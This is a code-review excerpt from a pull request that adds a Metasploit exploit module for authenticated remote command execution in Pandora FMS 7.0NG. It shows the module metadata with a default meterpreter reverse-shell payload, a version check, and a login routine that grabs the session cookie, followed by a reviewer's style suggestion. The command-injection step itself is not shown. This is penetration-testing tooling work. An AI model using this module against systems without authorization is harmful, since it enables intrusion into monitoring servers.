modules/exploits/linux/http/pandora_ping_cmd_exec.rb

```diff
@@ -0,0 +1,140 @@
+  include Msf::Exploit::CmdStager
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Pandora FMS Ping Authenticated Remote Code Execution',
+      'Description'     => %q{
+        This module exploits a vulnerability found in Pandora FMS 7.0NG and lower.
+        net_tools.php in Pandora FMS 7.0NG allows remote attackers to execute arbitrary OS commands.
+      },
+      'Author'          =>
+        [
+          'Onur ER <onur@onurer.net>' # Vulnerability discovery and Metasploit module
+        ],
+      'DisclosureDate'  => '2020-03-09',
+      'License'         => MSF_LICENSE,
+      'Platform'        => 'linux',
+      'Arch'            => [ARCH_X86, ARCH_X64],
+      'Privileged'      => false,
+      'Targets'         =>
+        [
+          ['Automatic Target', {}]
+        ],
+      'DefaultOptions'  =>
+        {
+          'RPORT'   => 80,
+          'Payload' => 'linux/x86/meterpreter/reverse_tcp'
+        },
+      'DefaultTarget'   => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable Pandora FMS instance', '/pandora_console/']),
+        OptString.new('USERNAME', [true, 'The username to authenticate with']),
+        OptString.new('PASSWORD', [true, 'The password to authenticate with'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method'  => 'GET',
+      'uri'     => normalize_uri(target_uri, 'index.php')
+    })
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    unless res.body =~ /Pandora/i
+      return CheckCode::Safe
+    end
+
+    pandora_version = res.body.scan('/<div id="ver_num">v(.*?)<\/div>/').flatten.first
+    version = Gem::Version.new(pandora_version)
+
+    print_status("Pandora FMS version #{version}") if version
+
+    if Gem::Version.new(version) <= Gem::Version.new('7.0NG')
+      return Exploit::CheckCode::Appears
+    end
+
+    CheckCode::Detected
+  end
+
+  def authenticate
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri, 'index.php'),
+      'vars_get'  => {
+        'login'   => '1'
+      },
+      'vars_post' => {
+        'nick'          => datastore['USERNAME'],
+        'pass'          => datastore['PASSWORD'],
+        'login_button'  => 'Login'
+      }
+    })
+
+    return auth_succeeded?(res)
+  end
+
+  def auth_succeeded?(res)
+    if res && res.code == 200 && res.body.include?('Welcome to Pandora FMS')
+      print_good('Successfully authenticated')
+      print_status('Attempting to retrieve session cookie')
+      @cookie = res.get_cookies
+      if @cookie.include?('PHPSESSID')
+        print_good("Successfully retrieved session cookie: #{@cookie}")
+        return true
+      else
+        print_error('Error retrieving cookie!')
+      end
+    else
+      print_error('Authentication failed!')
+    end
+
+    false
```

Comment:
This is just a stylistic suggestion. Feel free to disregard.

```suggestion
    unless res && res.code == 200 && res.body.include?('Welcome to Pandora FMS')
      print_error('Authentication failed!')
      return false
    end
    
    print_good('Successfully authenticated')
    print_status('Attempting to retrieve session cookie')
    @cookie = res.get_cookies
    
    unless @cookie.include?('PHPSESSID')
      print_error('Error retrieving cookie!')
      return false
    end
    
    print_good("Successfully retrieved session cookie: #{@cookie}")
    true
```